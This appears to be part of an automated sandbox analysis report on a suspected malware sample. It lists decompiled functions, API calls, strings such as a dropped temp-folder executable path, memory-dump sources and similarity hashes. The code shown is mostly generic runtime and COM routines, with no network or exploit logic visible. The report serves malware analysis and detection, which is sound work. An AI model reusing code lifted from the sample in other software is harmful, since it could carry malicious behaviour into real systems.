Instruction Fuzzy Hash: 11E01A72A042209AC6313F22FC028053EB1B7047163C0403BF1143AA32DB7E07179ACD

Uniqueness

Uniqueness Score: -1.00%

Function 03F5E9B8, Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 03F5E9C1

Part of subcall function 03F5F2E6: HeapFree.KERNEL32(00000000,00000000,?,03F60F6C,?,00000000,?,?,?,03F60F93,?,00000007,?,?,03F613B9,?), ref: 03F5F2FC
Part of subcall function 03F5F2E6: GetLastError.KERNEL32(?,?,03F60F6C,?,00000000,?,?,?,03F60F93,?,00000007,?,?,03F613B9,?,?), ref: 03F5F30E

_free.LIBCMT ref: 03F5E9D4
_free.LIBCMT ref: 03F5E9E5
_free.LIBCMT ref: 03F5E9F6

Memory Dump Source

Source File: 00000010.00000002.393907435.0000000003F50000.00000040.00000001.sdmp, Offset: 03F50000, based on PE: false

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 41abd5779f1a837d4f070380f7726483b1cd8c659127fb6c28e157d51941b183
Instruction ID: 172a2fb0fa4cb08084340c5c0ab53534568e6ed4836606ba838c487431fa9b93
Opcode Fuzzy Hash: 41abd5779f1a837d4f070380f7726483b1cd8c659127fb6c28e157d51941b183
Instruction Fuzzy Hash: D4E01ABAA143609B8631BF11FC018153EB1B7046123D0806AFA102E230CB7907139ACD

Uniqueness

Uniqueness Score: -1.00%

Function 03F54AC6, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 149memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 03F54BC2
SysFreeString.OLEAUT32 ref: 03F54C77

Strings

`O@, xrefs: 03F54AED

Memory Dump Source

Source File: 00000010.00000002.393907435.0000000003F50000.00000040.00000001.sdmp, Offset: 03F50000, based on PE: false

Similarity

API ID: String$AllocFree
String ID: `O@
API String ID: 344208780-3064660072
Opcode ID: 176e151823532976981d5b42e39bd4bccaec65ff0ddacf451c056d865b3672e1
Instruction ID: 0b8acf953b5716c1617f277f348464520568a6f532f4585180a2084ffa8371d4
Opcode Fuzzy Hash: 176e151823532976981d5b42e39bd4bccaec65ff0ddacf451c056d865b3672e1
Instruction Fuzzy Hash: 2C611875800F45CFD721EF39C448656B7F4FF8A350F018A2DE9AA8B651EB70A485CB42

Uniqueness

Uniqueness Score: -1.00%

Function 03F54368, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 147memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 03F54455
SysFreeString.OLEAUT32(00000000), ref: 03F54496

Strings

O@, xrefs: 03F54383

Memory Dump Source

Source File: 00000010.00000002.393907435.0000000003F50000.00000040.00000001.sdmp, Offset: 03F50000, based on PE: false

Similarity

API ID: String$AllocFree
String ID: O@
API String ID: 344208780-3325136296
Opcode ID: ce404913f4f117fea675fea39618b6970800dcb13571551c311d424dcdc42edf
Instruction ID: c93e712711a5cefae8b87ce3db7389e7ef3ff66e6ac803e655f4e8eaec9547da
Opcode Fuzzy Hash: ce404913f4f117fea675fea39618b6970800dcb13571551c311d424dcdc42edf
Instruction Fuzzy Hash: BD515BB4A40205DFCB14DFA5D888E9ABBB8FF48315F148568FD09AB390D735E841CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00404312, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137
memoryCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E00404312(void* __ebx, void* __ecx, void* __edi, void* __esi, char _a8) {
				intOrPtr _v20;
				char _v28;
				intOrPtr* _v36;
				void* _v40;
				void* _v44;
				void* _v48;
				intOrPtr* _v52;
				char _v68;
				intOrPtr* _t40;
				intOrPtr* _t41;
				void* _t44;
				intOrPtr* _t45;
				void* _t46;
				intOrPtr* _t47;
				void* _t52;
				intOrPtr* _t53;
				intOrPtr* _t55;
				intOrPtr* _t56;
				void* _t59;
				intOrPtr* _t60;
				intOrPtr _t62;
				signed int _t67;
				intOrPtr* _t69;
				intOrPtr* _t73;
				intOrPtr* _t85;
				intOrPtr* _t88;
				char* _t92;
				intOrPtr* _t93;
				void* _t96;
				intOrPtr _t97;

				_t97 = _t96 - 0x34;
				_t40 =  &_v28;
				 *((intOrPtr*)(_t40 - 4)) = _t97;
				 *((intOrPtr*)(_t40 + 8)) = 0xffffffff;
				 *((intOrPtr*)(_t40 + 4)) = 0x404f30;
				 *_t40 =  *[fs:0x0];
				 *[fs:0x0] = _t40;
				_v40 = 0;
				_t41 =  *((intOrPtr*)(__ecx + 4));
				if(_t41 == 0) {
					_t67 = 0;
					__eflags = 0;
					goto L18;
				} else {
					_t44 =  *((intOrPtr*)( *_t41 + 0x24))(_t41,  &_v40);
					_t67 = 0;
					if(_t44 < 0) {
						L18:
						 *[fs:0x0] = _v28;
						return _t67;
					} else {
						_t45 = _v40;
						if(_t45 == 0) {
							goto L18;
						} else {
							_t73 =  &_v48;
							 *_t73 = 0;
							_t46 =  *((intOrPtr*)( *_t45 + 0x28))(_t45, 9, _t73);
							_t67 = 0;
							if(_t46 < 0) {
								L16:
								_t47 = _v40;
								 *((intOrPtr*)( *_t47 + 8))(_t47);
								goto L18;
							} else {
								_t88 = _v48;
								if(_t88 == 0) {
									goto L16;
								} else {
									_t69 =  &_v44;
									 *_t69 = 0;
									_t92 =  &_v68;
									 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0xc)))) + 8))();
									_t52 =  *((intOrPtr*)( *_t88))(_t88, _t92, _t69, _t92);
									_t67 = 0;
									if(_t52 < 0) {
										L15:
										_t53 = _v48;
										 *((intOrPtr*)( *_t53 + 8))(_t53);
										goto L16;
									} else {
										_t55 = _v44;
										_t107 = _t55;
										if(_t55 == 0) {
											goto L15;
										} else {
											_v52 = _t55;
											_t56 = E00409B10(_t107);
											_t97 = _t97 + 4;
											_v36 = _t56;
											 *((intOrPtr*)(_t56 + 4)) = 0;
											 *((intOrPtr*)(_t56 + 8)) = 1;
											_v20 = 0;
											__imp__#2(L"Default", 0xc);
											 *_v36 = _t56;
											if(_t56 == 0) {
												E0040A890(0x8007000e);
												__eflags =  &_a8;
												return L00409B40(_v36);
											} else {
												_t85 = _v52;
												_v20 = 1;
												_t59 =  *((intOrPtr*)( *((intOrPtr*)( *_t85 + 0x24))))(_t85, _t56);
												_t93 = _v36;
												_t29 = _t59 > 0;
												_t67 = 0 | _t29;
												asm("lock dec dword [esi+0x8]");
												if(_t29 == 0) {
													_t62 =  *_t93;
													if(_t62 != 0) {
														__imp__#6(_t62);
														 *_t93 = 0;
													}
													_t63 =  *((intOrPtr*)(_t93 + 4));
													if( *((intOrPtr*)(_t93 + 4)) != 0) {
														E00409B76(_t63);
														_t97 = _t97 + 4;
													}
													L00409B40(_t93);
													_t97 = _t97 + 4;
												}
												_t60 = _v44;
												_v20 = 0xffffffff;
												 *((intOrPtr*)( *((intOrPtr*)( *_t60 + 8))))(_t60);
												goto L15;
											}
										}
									}
								}
							}
						}
					}
				}
			}

0x00404318
0x0040431b
0x00404320
0x00404323
0x0040432a
0x00404338
0x0040433a
0x00404340
0x00404347
0x0040434c
0x00404473
0x00404473
0x00000000
0x00404352
0x00404359
0x0040435c
0x00404360
0x00404475
0x00404478
0x00404487
0x00404366
0x00404366
0x0040436b
0x00000000
0x00404371
0x00404371
0x00404374
0x00404380
0x00404383
0x00404387
0x00404468
0x00404468
0x0040446e
0x00000000
0x0040438d
0x0040438d
0x00404392
0x00000000
0x00404398
0x00404398
0x0040439b
0x004043a4
0x004043aa
0x004043b2
0x004043b4
0x004043b8
0x0040445f
0x0040445f
0x00404465
0x00000000
0x004043be
0x004043be
0x004043c1
0x004043c3
0x00000000
0x004043c9
0x004043c9
0x004043ce
0x004043d3
0x004043d8
0x004043db
0x004043de
0x004043e5
0x004043ed
0x004043f8
0x004043fa
0x0040448d
0x00404496
0x004044a5
0x00404400
0x00404400
0x00404408
0x00404411
0x00404413
0x00404418
0x00404418
0x0040441b
0x0040441f
0x00404421
0x00404425
0x00404428
0x0040442e
0x0040442e
0x00404434
0x00404439
0x0040443c
0x00404441
0x00404441
0x00404445
0x0040444a
0x0040444a
0x0040444d
0x00404455
0x0040445d
0x00000000
0x0040445d
0x004043fa
0x004043c3
0x004043b8
0x00404392
0x00404387
0x0040436b
0x00404360

APIs

SysAllocString.OLEAUT32(Default), ref: 004043ED
SysFreeString.OLEAUT32(00000000), ref: 00404428

Strings

Default, xrefs: 004043E8

Memory Dump Source

Source File: 00000010.00000002.392640756.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: String$AllocFree
String ID: Default
API String ID: 344208780-753088835
Opcode ID: c8fde8d2952c700cd1dde46a878d6a607a77f06655536f1c36c520ba07a20a1e
Instruction ID: 75f60d6af0db612f2f35a12473dfc53e52c637210cdeb7e67568531ca1efec3e
Opcode Fuzzy Hash: c8fde8d2952c700cd1dde46a878d6a607a77f06655536f1c36c520ba07a20a1e
Instruction Fuzzy Hash: 2B514EB0A002059FDB10DFA4D884B9ABBF8FF48714F144169E919AB391D779EC05CB65

Uniqueness

Uniqueness Score: -1.00%

Function 03F54562, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(00417BAC), ref: 03F5463D
SysFreeString.OLEAUT32(00000000), ref: 03F54678

Strings

0O@, xrefs: 03F5457A

Memory Dump Source

Source File: 00000010.00000002.393907435.0000000003F50000.00000040.00000001.sdmp, Offset: 03F50000, based on PE: false

Similarity

API ID: String$AllocFree
String ID: 0O@
API String ID: 344208780-3658952408
Opcode ID: c8fde8d2952c700cd1dde46a878d6a607a77f06655536f1c36c520ba07a20a1e
Instruction ID: c7c881af1f57adf1cc4f2d2e481078e324f5657f55502d981b19d18f7b8d6922
Opcode Fuzzy Hash: c8fde8d2952c700cd1dde46a878d6a607a77f06655536f1c36c520ba07a20a1e
Instruction Fuzzy Hash: AA5127B4A01306DFDB14DFA5D888BAABBF8BF49314F144168F919AB390D775E841CB60

Uniqueness

Uniqueness Score: -1.00%

Function 03F5DBDA, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON

Download Yara Rule

Strings

C:\Users\user\AppData\Local\Temp\New Feature\4.exe, xrefs: 03F5DC1D, 03F5DC5A

Memory Dump Source

Source File: 00000010.00000002.393907435.0000000003F50000.00000040.00000001.sdmp, Offset: 03F50000, based on PE: false

Similarity

API ID:
String ID: C:\Users\user\AppData\Local\Temp\New Feature\4.exe
API String ID: 0-917010740
Opcode ID: 5867603207a0a5b9ffe2a1e3b5f175608109187e583c4bb27fcc7161f8e479a0
Instruction ID: 3cfdb0724422a459a379be585f71be880ce6fe90be0ab3a039e02ff1b14cf190
Opcode Fuzzy Hash: 5867603207a0a5b9ffe2a1e3b5f175608109187e583c4bb27fcc7161f8e479a0
Instruction Fuzzy Hash: 85419575E01355EBCB21EF999C85DAEBBFCEB84300B5440A6FA01DB210D7B09A41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 03F5BF40, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 03F5BF7F
__IsNonwritableInCurrentImage.LIBCMT ref: 03F5C033

Strings

csm, xrefs: 03F5C01D

Memory Dump Source

Source File: 00000010.00000002.393907435.0000000003F50000.00000040.00000001.sdmp, Offset: 03F50000, based on PE: false

Similarity

API ID: CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 3480331319-1018135373
Opcode ID: 859aa26956752a9f8403110642c8eec8ec11d0d97aaaf049b0883feefe3bd572
Instruction ID: 9c011d77a6e6d2ffe04920d699e7ee4ad666d3da7f56d8154021d845453776ff
Opcode Fuzzy Hash: 859aa26956752a9f8403110642c8eec8ec11d0d97aaaf049b0883feefe3bd572
Instruction Fuzzy Hash: 0F419035E00319ABCF10DFA8CC80A9EBBE5AF45314F148155FE159B3A1D7359A45CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0040C5D7, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112
COMMON

Download Yara Rule

C-Code - Quality: 57%

			E0040C5D7(void* __ecx, void* __edx, signed char* _a4, signed char* _a8, intOrPtr _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				signed int _v36;
				void* _v40;
				intOrPtr _v44;
				signed int _v48;
				intOrPtr _v56;
				void _v60;
				signed char* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t74;
				void* _t75;
				char _t76;
				signed char _t78;
				signed int _t80;
				signed char* _t81;
				signed int _t82;
				signed int _t83;
				intOrPtr* _t87;
				void* _t90;
				signed char* _t93;
				intOrPtr* _t96;
				signed char _t97;
				intOrPtr _t98;
				intOrPtr _t99;
				intOrPtr* _t101;
				signed int _t102;
				signed int _t103;
				signed char _t108;
				signed char* _t111;
				signed int _t112;
				void* _t113;
				signed char* _t116;
				void* _t121;
				signed int _t123;
				void* _t130;
				void* _t131;

				_t110 = __edx;
				_t100 = __ecx;
				_t96 = _a4;
				if( *_t96 == 0x80000003) {
					return _t74;
				} else {
					_push(_t121);
					_push(_t113);
					_t75 = E0040BEDC(_t96, __ecx, __edx, _t113, _t121);
					if( *((intOrPtr*)(_t75 + 8)) != 0) {
						__imp__EncodePointer(0);
						_t121 = _t75;
						if( *((intOrPtr*)(E0040BEDC(_t96, __ecx, __edx, 0, _t121) + 8)) != _t121 &&  *_t96 != 0xe0434f4d &&  *_t96 != 0xe0434352) {
							_t87 = E0040AC81(_t96, _a8, _a12, _a16, _a20, _a28, _a32);
							_t130 = _t130 + 0x1c;
							if(_t87 != 0) {
								L16:
								return _t87;
							}
						}
					}
					_t76 = _a20;
					_v24 = _t76;
					_v20 = 0;
					if( *((intOrPtr*)(_t76 + 0xc)) > 0) {
						_push(_a28);
						E0040ABB3(_t96, _t100, 0, _t121,  &_v40,  &_v24, _a24, _a16, _t76);
						_t112 = _v36;
						_t131 = _t130 + 0x18;
						_t87 = _v40;
						_v16 = _t87;
						_v8 = _t112;
						if(_t112 < _v28) {
							_t102 = _t112 * 0x14;
							_v12 = _t102;
							do {
								_t103 = 5;
								_t90 = memcpy( &_v60,  *((intOrPtr*)( *_t87 + 0x10)) + _t102, _t103 << 2);
								_t131 = _t131 + 0xc;
								if(_v60 <= _t90 && _t90 <= _v56) {
									_t93 = _v44 + 0xfffffff0 + (_v48 << 4);
									_t108 = _t93[4];
									if(_t108 == 0 ||  *((char*)(_t108 + 8)) == 0) {
										if(( *_t93 & 0x00000040) == 0) {
											_push(0);
											_push(1);
											E0040C1A1(_t112, _t96, _a8, _a12, _a16, _a20, _t93, 0,  &_v60, _a28, _a32);
											_t112 = _v8;
											_t131 = _t131 + 0x30;
										}
									}
								}
								_t112 = _t112 + 1;
								_t87 = _v16;
								_t102 = _v12 + 0x14;
								_v8 = _t112;
								_v12 = _t102;
							} while (_t112 < _v28);
						}
						goto L16;
					}
					E0040E8C3(_t96, _t100, _t110, 0, _t121);
					asm("int3");
					_t111 = _v68;
					_push(_t96);
					_push(_t121);
					_push(0);
					_t78 = _t111[4];
					if(_t78 == 0) {
						L41:
						_t80 = 1;
					} else {
						_t101 = _t78 + 8;
						if( *_t101 == 0) {
							goto L41;
						} else {
							_t116 = _a4;
							if(( *_t111 & 0x00000080) == 0 || ( *_t116 & 0x00000010) == 0) {
								_t97 = _t116[4];
								_t123 = 0;
								if(_t78 == _t97) {
									L33:
									if(( *_t116 & 0x00000002) == 0 || ( *_t111 & 0x00000008) != 0) {
										_t81 = _a8;
										if(( *_t81 & 0x00000001) == 0 || ( *_t111 & 0x00000001) != 0) {
											if(( *_t81 & 0x00000002) == 0 || ( *_t111 & 0x00000002) != 0) {
												_t123 = 1;
											}
										}
									}
									_t80 = _t123;
								} else {
									_t82 = _t97 + 8;
									while(1) {
										_t98 =  *_t101;
										if(_t98 !=  *_t82) {
											break;
										}
										if(_t98 == 0) {
											L29:
											_t83 = _t123;
										} else {
											_t99 =  *((intOrPtr*)(_t101 + 1));
											if(_t99 !=  *((intOrPtr*)(_t82 + 1))) {
												break;
											} else {
												_t101 = _t101 + 2;
												_t82 = _t82 + 2;
												if(_t99 != 0) {
													continue;
												} else {
													goto L29;
												}
											}
										}
										L31:
										if(_t83 == 0) {
											goto L33;
										} else {
											_t80 = 0;
										}
										goto L42;
									}
									asm("sbb eax, eax");
									_t83 = _t82 | 0x00000001;
									goto L31;
								}
							} else {
								goto L41;
							}
						}
					}
					L42:
					return _t80;
				}
			}

0x0040c5d7
0x0040c5d7
0x0040c5de
0x0040c5e7
0x0040c706
0x0040c5ed
0x0040c5ed
0x0040c5ee
0x0040c5ef
0x0040c5f9
0x0040c5fc
0x0040c602
0x0040c60c
0x0040c631
0x0040c636
0x0040c63b
0x0040c702
0x00000000
0x0040c703
0x0040c63b
0x0040c60c
0x0040c641
0x0040c644
0x0040c647
0x0040c64d
0x0040c653
0x0040c665
0x0040c66a
0x0040c66d
0x0040c670
0x0040c673
0x0040c676
0x0040c67c
0x0040c682
0x0040c685
0x0040c688
0x0040c697
0x0040c698
0x0040c698
0x0040c69d
0x0040c6b0
0x0040c6b2
0x0040c6b7
0x0040c6c2
0x0040c6c4
0x0040c6c6
0x0040c6e2
0x0040c6e7
0x0040c6ea
0x0040c6ea
0x0040c6c2
0x0040c6b7
0x0040c6f0
0x0040c6f1
0x0040c6f4
0x0040c6f7
0x0040c6fa
0x0040c6fd
0x0040c688
0x00000000
0x0040c67c
0x0040c707
0x0040c70c
0x0040c710
0x0040c713
0x0040c714
0x0040c715
0x0040c716
0x0040c71b
0x0040c793
0x0040c795
0x0040c71d
0x0040c71d
0x0040c723
0x00000000
0x0040c725
0x0040c728
0x0040c72b
0x0040c732
0x0040c735
0x0040c739
0x0040c76b
0x0040c76e
0x0040c775
0x0040c77b
0x0040c785
0x0040c78e
0x0040c78e
0x0040c785
0x0040c77b
0x0040c78f
0x0040c73b
0x0040c73b
0x0040c73e
0x0040c73e
0x0040c742
0x00000000
0x00000000
0x0040c746
0x0040c75a
0x0040c75a
0x0040c748
0x0040c748
0x0040c74e
0x00000000
0x0040c750
0x0040c750
0x0040c753
0x0040c758
0x00000000
0x00000000
0x00000000
0x00000000
0x0040c758
0x0040c74e
0x0040c763
0x0040c765
0x00000000
0x0040c767
0x0040c767
0x0040c767
0x00000000
0x0040c765
0x0040c75e
0x0040c760
0x00000000
0x0040c760
0x00000000
0x00000000
0x00000000
0x0040c72b
0x0040c723
0x0040c796
0x0040c79a
0x0040c79a

APIs

EncodePointer.KERNEL32(00000000,00000000,00000000,1FFFFFFF), ref: 0040C5FC

Strings

RCC, xrefs: 0040C616
MOC, xrefs: 0040C60E

Memory Dump Source

Source File: 00000010.00000002.392640756.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 8732ebb23f817d70b6d258cfff8fac19d111fe10f8b5ce0f54242f3685ed19cf
Instruction ID: f4a5897ce65cf7b85f426a19b6b1ca42b9172e128ddba0bc28069f2dd2182bfd
Opcode Fuzzy Hash: 8732ebb23f817d70b6d258cfff8fac19d111fe10f8b5ce0f54242f3685ed19cf
Instruction Fuzzy Hash: 5E412871900209EFCF25DF98CD81AAE7BB5BF48304F14866AF904B7291D3399960DF59

Uniqueness

Uniqueness Score: -1.00%

Function 03F5C827, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMON

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000), ref: 03F5C84C

Strings

MOC, xrefs: 03F5C85E
RCC, xrefs: 03F5C866

Memory Dump Source

Source File: 00000010.00000002.393907435.0000000003F50000.00000040.00000001.sdmp, Offset: 03F50000, based on PE: false

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 8732ebb23f817d70b6d258cfff8fac19d111fe10f8b5ce0f54242f3685ed19cf
Instruction ID: 6f4fa549200a6d065f4ff98430496d44528617b52defe70f2b2d189a0c95a378
Opcode Fuzzy Hash: 8732ebb23f817d70b6d258cfff8fac19d111fe10f8b5ce0f54242f3685ed19cf
Instruction Fuzzy Hash: E0412A76D0020AAFDF15DF98CD80AAEBBB5BF48305F194199FE066B210D3359950DB50

Uniqueness

Uniqueness Score: -1.00%

Function 03F60231, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100COMMON

Download Yara Rule

APIs

Part of subcall function 03F5FFDA: GetOEMCP.KERNEL32(00000000,03F6024C,03F632F8,00000000,?,?,00000000,?,03F632F8), ref: 03F60005

_free.LIBCMT ref: 03F602A9

Strings

0)B, xrefs: 03F602D1

Memory Dump Source

Source File: 00000010.00000002.393907435.0000000003F50000.00000040.00000001.sdmp, Offset: 03F50000, based on PE: false

Similarity

API ID: _free
String ID: 0)B
API String ID: 269201875-129926101
Opcode ID: 8488376a2d2188d14aad93bb6cc57a6462759d9486ef6364f19c776a48d62325
Instruction ID: f71fbbd72c5e64e75f87076ca70e8673eb92234643e2f9cc317efaa7453109f1
Opcode Fuzzy Hash: 8488376a2d2188d14aad93bb6cc57a6462759d9486ef6364f19c776a48d62325
Instruction Fuzzy Hash: 1131B07590834AAFCB11DFA8C840A9E7BF4FF45314F2541AAF9119B2A0EF71D951CB50

Uniqueness

Uniqueness Score: -1.00%

Function 03F54D62, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 03F54DEF
SysFreeString.OLEAUT32(00000000), ref: 03F54E28

Strings

pO@, xrefs: 03F54D7B

Memory Dump Source

Source File: 00000010.00000002.393907435.0000000003F50000.00000040.00000001.sdmp, Offset: 03F50000, based on PE: false

Similarity

API ID: String$AllocFree
String ID: pO@
API String ID: 344208780-2861409048
Opcode ID: 6b05fae84fdb2f4d8dcfe72ce0726cbdac870b71067ccd33669e0f33d021af04
Instruction ID: dc8fed3c5d4f1271e973807113cc0726c6f2d6df5e74d21adc9708ae0f8d0efa
Opcode Fuzzy Hash: 6b05fae84fdb2f4d8dcfe72ce0726cbdac870b71067ccd33669e0f33d021af04
Instruction Fuzzy Hash: E3316BB1E402069FDB10EF65DC44B9ABBB8EF04714F148169FD18AB290E779E840CAA0

Uniqueness

Uniqueness Score: -1.00%

Function 0040A627, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E0040A627(void* __ecx, struct _EXCEPTION_POINTERS* _a4) {

				asm("repne jnz 0x5");
				asm("repne ret");
				asm("repne jmp 0x2e");
				SetUnhandledExceptionFilter(0);
				UnhandledExceptionFilter(_a4);
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

0x0040a62d
0x0040a630
0x0040a632
0x0040a63d
0x0040a646
0x0040a65f

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0040A66B
___raise_securityfailure.LIBCMT ref: 0040A752

Strings

X2B, xrefs: 0040A74D

Memory Dump Source

Source File: 00000010.00000002.392640756.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: X2B
API String ID: 3761405300-3897348823
Opcode ID: a0d1d52424c414b53e9ecab753e1f09eb75baf4f0cafbc0f4b83384951358c6a
Instruction ID: 78d2ed35565f088e2bc330034257820a3738e6905d0e9988e3cd22fb138ba8e4
Opcode Fuzzy Hash: a0d1d52424c414b53e9ecab753e1f09eb75baf4f0cafbc0f4b83384951358c6a
Instruction Fuzzy Hash: F321E4B4700340EED724DF19E9816547BF4BB08716F94547AE9088A3B0DBB99B82CF4D

Uniqueness

Uniqueness Score: -1.00%

Function 0040EE9D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E0040EE9D(void* __ebx, void* __ecx, void* __edx, void* __edi) {
				void* __esi;
				intOrPtr _t1;
				signed int _t2;
				intOrPtr _t5;
				signed int _t6;
				void* _t25;
				signed int _t26;
				void* _t28;
				void* _t33;
				void* _t34;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				long _t40;
				void* _t43;

				_t34 = __edi;
				_t33 = __edx;
				_t28 = __ecx;
				_t25 = __ebx;
				_t1 =  *0x422920; // 0x8
				_push(_t39);
				_t45 = _t1 - 0xffffffff;
				if(_t1 == 0xffffffff) {
					L5:
					_t2 = E004115A3(__eflags, _t1, 0xffffffff);
					__eflags = _t2;
					if(_t2 == 0) {
						goto L14;
					} else {
						_t39 = E0040F24A(1, 0x364);
						_pop(_t28);
						__eflags = _t39;
						if(__eflags != 0) {
							__eflags = E004115A3(__eflags,  *0x422920, _t39);
							if(__eflags != 0) {
								E0040EC0E(_t39, "P.B");
								E0040F096(0);
								_t43 = _t43 + 0xc;
								goto L12;
							} else {
								E004115A3(__eflags,  *0x422920, _t17);
								_push(_t39);
								goto L8;
							}
						} else {
							E004115A3(__eflags,  *0x422920, _t16);
							_push(_t39);
							L8:
							E0040F096();
							_pop(_t28);
							goto L14;
						}
					}
				} else {
					_t39 = E00411564(_t45, _t1);
					if(_t39 == 0) {
						_t1 =  *0x422920; // 0x8
						goto L5;
					} else {
						if(_t39 == 0xffffffff) {
							L14:
							E0040E8C3(_t25, _t28, _t33, _t34, _t39);
							asm("int3");
							_push(_t25);
							_push(_t39);
							_push(_t34);
							_t40 = GetLastError();
							_t5 =  *0x422920; // 0x8
							__eflags = _t5 - 0xffffffff;
							if(__eflags == 0) {
								L21:
								_t6 = E004115A3(__eflags, _t5, 0xffffffff);
								__eflags = _t6;
								if(_t6 == 0) {
									goto L18;
								} else {
									_t35 = E0040F24A(1, 0x364);
									__eflags = _t35;
									if(__eflags != 0) {
										__eflags = E004115A3(__eflags,  *0x422920, _t35);
										if(__eflags != 0) {
											E0040EC0E(_t35, "P.B");
											E0040F096(0);
											goto L28;
										} else {
											_t26 = 0;
											E004115A3(__eflags,  *0x422920, 0);
											_push(_t35);
											goto L24;
										}
									} else {
										_t26 = 0;
										__eflags = 0;
										E004115A3(0,  *0x422920, 0);
										_push(0);
										L24:
										E0040F096();
										goto L19;
									}
								}
							} else {
								_t35 = E00411564(__eflags, _t5);
								__eflags = _t35;
								if(__eflags == 0) {
									_t5 =  *0x422920; // 0x8
									goto L21;
								} else {
									__eflags = _t35 - 0xffffffff;
									if(_t35 != 0xffffffff) {
										L28:
										_t26 = _t35;
									} else {
										L18:
										_t26 = 0;
										__eflags = 0;
										L19:
										_t35 = _t26;
									}
								}
							}
							SetLastError(_t40);
							asm("sbb edi, edi");
							_t37 =  ~_t35 & _t26;
							__eflags = _t37;
							return _t37;
						} else {
							L12:
							if(_t39 == 0) {
								goto L14;
							} else {
								return _t39;
							}
						}
					}
				}
			}

0x0040ee9d
0x0040ee9d
0x0040ee9d
0x0040ee9d
0x0040ee9d
0x0040eea2
0x0040eea3
0x0040eea6
0x0040eec0
0x0040eec3
0x0040eec8
0x0040eeca
0x00000000
0x0040eecc
0x0040eed8
0x0040eedb
0x0040eedc
0x0040eede
0x0040ef01
0x0040ef03
0x0040ef1a
0x0040ef21
0x0040ef26
0x00000000
0x0040ef05
0x0040ef0c
0x0040ef11
0x00000000
0x0040ef11
0x0040eee0
0x0040eee7
0x0040eeec
0x0040eeed
0x0040eeed
0x0040eef2
0x00000000
0x0040eef2
0x0040eede
0x0040eea8
0x0040eeae
0x0040eeb2
0x0040eebb
0x00000000
0x0040eeb4
0x0040eeb7
0x0040ef31
0x0040ef31
0x0040ef36
0x0040ef39
0x0040ef3a
0x0040ef3b
0x0040ef42
0x0040ef44
0x0040ef49
0x0040ef4c
0x0040ef6a
0x0040ef6d
0x0040ef72
0x0040ef74
0x00000000
0x0040ef76
0x0040ef82
0x0040ef86
0x0040ef88
0x0040efad
0x0040efaf
0x0040efc8
0x0040efcf
0x00000000
0x0040efb1
0x0040efb1
0x0040efba
0x0040efbf
0x00000000
0x0040efbf
0x0040ef8a
0x0040ef8a
0x0040ef8a
0x0040ef93
0x0040ef98
0x0040ef99
0x0040ef99
0x00000000
0x0040ef9e
0x0040ef88
0x0040ef4e
0x0040ef54
0x0040ef56
0x0040ef58
0x0040ef65
0x00000000
0x0040ef5a
0x0040ef5a
0x0040ef5d
0x0040efd7
0x0040efd7
0x0040ef5f
0x0040ef5f
0x0040ef5f
0x0040ef5f
0x0040ef61
0x0040ef61
0x0040ef61
0x0040ef5d
0x0040ef58
0x0040efda
0x0040efe2
0x0040efe4
0x0040efe4
0x0040efeb
0x0040eeb9
0x0040ef29
0x0040ef2b
0x00000000
0x0040ef2d
0x0040ef30
0x0040ef30
0x0040ef2b
0x0040eeb7
0x0040eeb2

APIs

_free.LIBCMT ref: 0040EEED
_free.LIBCMT ref: 0040EF21

Strings

P.B, xrefs: 0040EF14

Memory Dump Source

Source File: 00000010.00000002.392640756.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: _free
String ID: P.B
API String ID: 269201875-2678322
Opcode ID: bb42c2d98b0f1d5dd7101c848f21f1357e40b6d2e833bc1cc4e40a5a2cacb5ec
Instruction ID: 63c0b0ba895f2f91e3532fccab75f84df2ac1a462d561d9ff5b143c00ccae353
Opcode Fuzzy Hash: bb42c2d98b0f1d5dd7101c848f21f1357e40b6d2e833bc1cc4e40a5a2cacb5ec
